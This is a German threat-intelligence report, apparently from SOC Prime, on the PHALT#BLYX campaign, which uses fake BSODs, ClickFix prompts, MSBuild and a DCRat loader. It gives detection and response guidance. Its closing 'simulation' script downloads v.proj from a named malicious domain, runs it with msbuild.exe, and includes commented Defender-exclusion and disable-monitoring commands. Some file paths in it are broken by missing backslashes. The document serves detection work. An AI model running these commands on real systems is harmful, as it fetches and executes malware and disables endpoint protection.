SOC Prime Bias: Mittel

06 Jan. 2026 19:06

PHALT#BLYX-Analyse: Gefälschte BSODs und vertrauenswürdige Build-Tools in Malware-Ketten

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
PHALT#BLYX-Analyse: Gefälschte BSODs und vertrauenswürdige Build-Tools in Malware-Ketten
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht beschreibt eine mehrstufige Eindringungskette, die den Gastgewerbesektor betrifft und eine gefälschte Booking.com-Seite, eine irreführende Blue-Screen-Animation und eine ClickFix-ähnliche Aufforderung kombiniert, um Benutzer dazu zu bringen, einen PowerShell-Dropper auszuführen. Dieser Dropper ruft eine MSBuild-Projektdatei ab, die einen angepassten DCRat-Loader ausführt. Der Loader manipuliert Windows Defender, setzt Persistenz mithilfe einer .url-Verknüpfung im Startup-Ordner und injiziert seine Nutzlast in legitime Prozesse. Durch die Nutzung von Bordmitteln wie PowerShell und MSBuild.exe reduzieren die Betreiber offensichtliche Malware-Spuren. Russischsprachige Artefakte in der Kette werden ebenfalls als Hinweis auf die Urheberschaft erwähnt.

Untersuchung

Securonix-Forscher kartierten den Ablauf von Phishing-E-Mails, die „Reservierungsstornierungs“-Links zu einer bösartigen Domain anbieten, dann zu einem PowerShell-Einzeiler, der msbuild.exe lokalisiert, eine v.proj-Datei herunterlädt und diese ausführt. Das v.proj-Projekt führt mehrere Aktionen aus: Es fügt Ausschlüsse in Windows Defender hinzu, lädt staxs.exe (eine DCRat-Variante) herunter, erstellt eine .url-Verknüpfung im Startup-Ordner zur Persistenz und verbindet sich über Port 3535 mit der Befehls- und Steuerinfrastruktur. Der Loader komprimiert dann die Endphase und injiziert sie in aspnet_compiler.exe, wobei Prozess Hollowing verwendet wird, um sich in legitime Aktivitäten zu integrieren.

Minderung

Reduzieren Sie die Exposition, indem Sie Benutzer darin schulen, ClickFix-ähnliche Aufforderungen und „führen Sie diesen Befehl aus, um zu reparieren“ soziale Manipulation zu erkennen. Überwachen und beschränken Sie die Ausführung von MSBuild.exe – insbesondere, wenn es aus ungewöhnlichen Pfaden oder benutzergesteuerten Workflows aufgerufen wird – und aktivieren Sie die Protokollierung von PowerShell-Skriptblöcken für bessere Sichtbarkeit. Fügen Sie Erkennungen für die Erstellung von .url-Verknüpfungen im Startup-Ordner und für Änderungen an Windows Defender-Ausschlüssen hinzu. Blockieren Sie auf Netzwerkebene den ausgehenden Datenverkehr zu den identifizierten bösartigen Domains und beschränken Sie explizit oder warnen Sie vor verdächtigem ausgehendem Datenverkehr zu TCP/3535, wo es nicht erforderlich ist.

Reaktion

Wenn Aktivitäten erkannt werden, isolieren Sie den Host und sichern Sie wichtige Artefakte, einschließlich v.proj, staxs.exe und alle .url-Dateien im Startup-Ordner. Entfernen Sie unautorisierte Defender-Ausschlüsse, beenden Sie bösartige oder injizierte Prozesse und blockieren Sie zugehörige C2-Domains/IPs – insbesondere alle Kommunikationen über Port 3535. Setzen Sie potenziell kompromittierte Anmeldeinformationen zurück, führen Sie einen vollständigen Malware-Scan durch und untersuchen Sie die Umgebung auf ähnliche MSBuild-gesteuerte Ausführungen und PowerShell-Befehlsmuster. Implementieren Sie abschließend Bedrohungsinformationsgestützte Erkennungen, die sich auf den Missbrauch von MSBuild, das Verhalten von ClickFix und die Persistenz durch Startup-Verknüpfungen konzentrieren, um ein Wiederauftreten zu verhindern.

„graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef file fill:#e6e6e6 classDef folder fill:#d9ead3 %% Knoten – Aktionen action_phishing[„<b>Aktion</b> – <b>T1566.002 Spearphishing-Link</b><br/><b>Beschreibung</b>: Das Opfer erhält eine E-Mail, die von Booking.com zu stammen scheint, und klickt auf einen bösartigen Link zu einer gefälschten Buchungsseite.“] class action_phishing action action_user_execution[„<b>Aktion</b> – <b>T1204.001 Benutzer-Ausführung</b> & <b>T1204.004 Bösartiges Kopieren&Einfügen</b><br/><b>Beschreibung</b>: Die gefälschte Seite zeigt eine BSOD-ähnliche Seite an, die den Benutzer auffordert, einen PowerShell-Befehl in das Ausführen-Dialogfeld einzufügen.“] class action_user_execution action action_defense_evasion_exclusions[„<b>Aktion</b> – <b>T1562 Verteidigungsbeeinträchtigung</b> & <b>T1564.012 Datei/Pfad-Ausnahmen</b><br/><b>Beschreibung</b>: Das v.proj-Skript fügt Windows Defender-Ausnahmen für ProgramData und gängige ausführbare Erweiterungen hinzu.“] class action_defense_evasion_exclusions action action_persistence_shortcut[„<b>Aktion</b> – <b>T1547.009 Verknüpfungsänderung</b><br/><b>Beschreibung</b>: Erstellt eine Internet-Verknüpfung (.url) im Autostart-Ordner des Benutzers, die auf die abgelegte ausführbare Datei verweist.“] class action_persistence_shortcut action action_process_hollowing[„<b>Aktion</b> – <b>T1055.012 Prozess-Hollowing</b><br/><b>Beschreibung</b>: Injektiert die endgültige DCRat-Nutzlast in aspnet_compiler.exe unter Verwendung von Prozess-Hollowing.“] class action_process_hollowing action action_reflective_loading[„<b>Aktion</b> – <b>T1620 Reflektives Laden von Code</b><br/><b>Beschreibung</b>: Lädt zusätzliche DLL-Nutzlasten reflektiv über Assembly.Load.“] class action_reflective_loading action action_c2_nonstandard_port[„<b>Aktion</b> – <b>T1571 Nicht-standardisierter Port</b><br/><b>Beschreibung</b>: RAT kommuniziert mit C2-Servern über TCP-Port 3535.“] class action_c2_nonstandard_port action action_c2_dynamic_resolution[„<b>Aktion</b> – <b>T1568 Dynamische Auflösung</b><br/><b>Beschreibung</b>: Löst zur Laufzeit mehrere C2-Domänen auf (z. B. asj77.com).“] class action_c2_dynamic_resolution action action_obfuscation[„<b>Aktion</b> – <b>T1027.005 Verschleierte Dateien oder Informationen</b><br/><b>Beschreibung</b>: Nutzlasten sind stark verschleiert und gepackt, um statische Erkennung zu umgehen.“] class action_obfuscation action %% Knoten – Tools tool_powershell[„<b>Werkzeug</b> – <b>T1059.001 PowerShell</b><br/><b>Beschreibung</b>: Führt den bösartigen Befehl aus, der die MSBuild-Projektdatei herunterlädt.“] class tool_powershell tool tool_msbuild[„<b>Werkzeug</b> – <b>T1127.001 MSBuild</b><br/><b>Beschreibung</b>: Vertrauenswürdiges Entwicklerwerkzeug, das zum Kompilieren und Ausführen der bösartigen v.proj-Datei verwendet wird.“] class tool_msbuild tool tool_aspnet_compiler[„<b>Werkzeug</b> – aspnet_compiler.exe<br/><b>Beschreibung</b>: Legitimer .NET-Compiler, der für das Prozess-Hollowing angegriffen wird.“] class tool_aspnet_compiler process %% Knoten – Malware / Dateien malware_vproj[„<b>Malware</b> – v.proj (bösartiges MSBuild-Projekt)<br/><b>Beschreibung</b>: Heruntergeladen von PowerShell, kompiliert von MSBuild, fügt Defender-Ausnahmen hinzu und legt die Nutzlast ab.“] class malware_vproj malware malware_dcrat[„<b>Malware</b> – DCRat-Nutzlast<br/><b>Beschreibung</b>: Endgültiger Remote-Access-Trojaner, der in aspnet_compiler.exe injiziert wird.“] class malware_dcrat malware file_shortcut[„<b>Datei</b> – Autostart-Verknüpfung (.url)<br/><b>Beschreibung</b>: Zeigt auf die abgelegte DCRat-ausführbare Datei und gewährleistet Autostart beim Login.“] class file_shortcut file folder_startup[„<b>Ordner</b> – Autostart-Verzeichnis<br/><b>Beschreibung</b>: Beinhaltet die bösartige Verknüpfung, die Persistenz verursacht.“] class folder_startup folder file_dcrat_exe[„<b>Datei</b> – Abgelegte DCRat-ausführbare Datei<br/><b>Beschreibung</b>: Wird nach Aktivierung der Verknüpfung ausgeführt.“] class file_dcrat_exe file dll_payloads[„<b>Datei</b> – Zusätzliche DLL-Nutzlasten<br/><b>Beschreibung</b>: Werden reflektiv von der DCRat-Nutzlast geladen.“] class dll_payloads file port_3535[„<b>Netzwerk</b> – TCP-Port 3535<br/><b>Beschreibung</b>: Wird für C2-Kommunikation verwendet.“] class port_3535 file domain_asj77[„<b>Netzwerk</b> – asj77.com (C2-Domäne)<br/><b>Beschreibung</b>: Wird zur Laufzeit für Kommando und Kontrolle aufgelöst.“] class domain_asj77 file %% Verbindungen – Fluss action_phishing u002du002d>|führt zu| action_user_execution action_user_execution u002du002d>|führt aus| tool_powershell tool_powershell u002du002d>|lädt herunter| malware_vproj malware_vproj u002du002d>|kompiliert von| tool_msbuild tool_msbuild u002du002d>|führt aus| malware_vproj malware_vproj u002du002d>|fügt hinzu| action_defense_evasion_exclusions action_defense_evasion_exclusions u002du002d>|erstellt| file_shortcut file_shortcut u002du002d>|platzieren in| folder_startup folder_startup u002du002d>|lädt| file_dcrat_exe malware_vproj u002du002d>|legt ab| file_dcrat_exe file_dcrat_exe u002du002d>|läuft| malware_dcrat malware_dcrat u002du002d>|injiziert in| tool_aspnet_compiler tool_aspnet_compiler u002du002d>|gehohlt von| malware_dcrat malware_dcrat u002du002d>|lädt reflektiv| dll_payloads malware_dcrat u002du002d>|kommuniziert über| action_c2_nonstandard_port action_c2_nonstandard_port u002du002d>|verwendet| port_3535 malware_dcrat u002du002d>|verwendet dynamische Auflösung| action_c2_dynamic_resolution action_c2_dynamic_resolution u002du002d>|löst auf zu| domain_asj77 malware_dcrat u002du002d>|verschleiert durch| action_obfuscation „

Angriffsablauf

Erkennungen

Herunterladen oder Hochladen über Powershell (über cmdline)

SOC Prime Team
06. Jan. 2026

Verdächtige Änderungen an den Windows Defender-Einstellungen (über PowerShell)

SOC Prime Team
06. Jan. 2026

Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)

SOC Prime Team
06. Jan. 2026

Verdächtige Binaries / Skripte im Autostart-Ort (über file_event)

SOC Prime Team
06. Jan. 2026

IOCs (HashSha512) zur Erkennung: Analyse von PHALT#BLYX: Wie gefälschte BSODs und vertrauenswürdige Build-Tools zur Erstellung einer Malware-Infektion verwendet werden

SOC Prime AI Regeln
06. Jan. 2026

IOCs (SourceIP) zur Erkennung: Analyse von PHALT#BLYX: Wie gefälschte BSODs und vertrauenswürdige Build-Tools zur Erstellung einer Malware-Infektion verwendet werden

SOC Prime AI Regeln
06. Jan. 2026

IOCs (HashSha256) zur Erkennung: Analyse von PHALT#BLYX: Wie gefälschte BSODs und vertrauenswürdige Build-Tools zur Erstellung einer Malware-Infektion verwendet werden

SOC Prime AI Regeln
06. Jan. 2026

IOCs (DestinationIP) zur Erkennung: Analyse von PHALT#BLYX: Wie gefälschte BSODs und vertrauenswürdige Build-Tools zur Erstellung einer Malware-Infektion verwendet werden

SOC Prime AI Regeln
06. Jan. 2026

PHALT#BLYX Schadsoftwareausführung über MSBuild und Prozess-Hollowing [Windows Prozess-Erstellung]

SOC Prime AI Regeln
06. Jan. 2026

PHALT#BLYX Malware-Kampagne Nutzung von PowerShell und MSBuild zur Infektion [Windows PowerShell]

SOC Prime AI Regeln
06. Jan. 2026

Simulation Ausführung

Voraussetzung: Die Telemetrie- & Baseline-Vorprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Gegnertechnik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und die narrative Darstellung reflektieren direkt die identifizierten TTPs und zielen darauf ab, die genau erwartete Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angreifernarrativ & Befehle:
    Der Bedrohungsakteur öffnet eine PowerShell-Sitzung auf einem kompromittierten Endpunkt. Zuerst findet er die msbuild.exe Binärdatei auf dem System, dann lädt er ein bösartiges MSBuild-Projekt (v.proj) nach C:ProgramData. Der Angreifer ruft sofort msbuild.exe auf, um die Nutzlast auszuführen, die eine zweite Stufe fallen lässt. Schließlich manipuliert er Windows Defender, indem er Ausschlüsse hinzufügt und das Echtzeit-Überwachungsprogramm deaktiviert, um die Persistenz sicherzustellen.

  • Regressions-Testskript:

    # PHALT#BLYX-Simulationsskript – reproduziert erkennungsauslösende Aktivitäten
    # --------------------------------------------------------------
    # 1. Finden Sie msbuild.exe
    $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName
    
    # 2. Laden Sie das bösartige MSBuild-Projekt in ProgramData herunter
    $projUrl = "https://2fa-bns.com/v.proj"
    $dest    = "$env:ProgramDatav.proj"
    Invoke-WebRequest -Uri $projUrl -OutFile $dest
    
    # 3. Führen Sie das Projekt mit msbuild.exe aus
    & $msb $dest
    
    # 4. Ändern Sie die Windows Defender-Einstellungen (einer der folgenden wird die Regel zufriedenstellen)
    #    Kommentieren Sie die gewünschten Zeilen aus, um die Aktionen des Angreifers zu simulieren.
    
    # Ausschlusspfad hinzufügen
    # Add-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Ausschluss für .exe Dateien hinzufügen
    # Add-MpPreference -ExclusionExtension ".exe"
    
    # Ausschluss für .ps1 Dateien hinzufügen
    # Add-MpPreference -ExclusionExtension ".ps1"
    
    # Deaktivieren Sie die Echtzeitüberwachung
    # Set-MpPreference -DisableRealtimeMonitoring $true
  • Bereinigungskommandos:

    # Entfernen Sie die abgelegte Projektdatei
    Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue
    
    # Stellen Sie die Echtzeitüberwachung von Windows Defender wieder her (falls sie deaktiviert war)
    Set-MpPreference -DisableRealtimeMonitoring $false
    
    # Entfernen Sie alle hinzugefügten Ausschlüsse (Beispiel für Pfadausschluss)
    Remove-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Optional löschen Sie alle verbleibenden Dateien, die von der Nutzlast erstellt wurden
    # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue